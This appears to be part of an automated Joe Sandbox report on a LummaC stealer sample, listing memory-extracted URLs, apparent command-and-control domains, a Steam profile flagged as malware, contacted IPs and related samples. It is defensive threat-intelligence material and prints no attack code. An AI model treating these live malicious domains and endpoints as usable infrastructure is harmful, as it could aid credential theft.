                                                      https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • URL Reputation: malware
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=M7aUfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://store.stxfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://sketchfab.comfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://bathdoomgaz.store:443/apiTfile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://lv.queniujq.cnfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • URL Reputation: malware
                                                              		unknown
                                                              https://www.youtube.com/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cdn.akamfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://sergei-esenin.com/ifile.exe, 00000000.00000002.2148574776.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.google.com/recaptcha/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://checkout.steampowered.com/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://store.steampowered.com/;file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://store.steampowered.com/about/file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://sergei-esenin.com/apibfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://help.steampowered.com/en/file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://steamcommunity.com/market/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://store.steampowered.com/news/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://sergei-esenin.com/apiffile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://help.steampowefile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://sergei-esenin.com/apiYfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://store.steampowered.com/stats/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://medal.tvfile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://help.steampofile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://steambroadcast.ffile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://login.steampowered.com/file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://store.steampowered.com/legal/file.exe, 00000000.00000002.2148763674.000000000168A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Gu9gs5hffile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=IZH_ONwLX4kw&amp;l=efile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://recaptcha.netfile.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://studennotediw.store:443/apifile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2147642933.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2148574776.0000000001614000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://127.0.0.1:27060file.exe, 00000000.00000003.2137990496.0000000001662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://clearancek.site:443/apiifile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2137923043.0000000001678000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147609286.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://spirittunek.store:443/apifile.exe, 00000000.00000002.2148574776.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147642933.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  23.192.247.89
                                                                                                                  		steamcommunity.comUnited States
                                                                                                                  		16625AKAMAI-ASUStrue
                                                                                                                  172.67.206.204
                                                                                                                  		sergei-esenin.comUnited States
                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1531613
                                                                                                                  Start date and time:2024-10-11 13:44:09 +02:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 2m 41s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:2
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:file.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  07:45:02API Interceptor3x Sleep call for process: file.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  23.192.247.89TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      172.67.206.204file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          steamcommunity.comSecuriteInfo.com.Trojan.Inject5.10240.30655.18394.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          nU3dGuezsg.exeGet hashmaliciousAmadey, StealcBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          l0T55kCdTI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.199.218.33
                                                                                                                                                          sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          l0T55kCdTI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
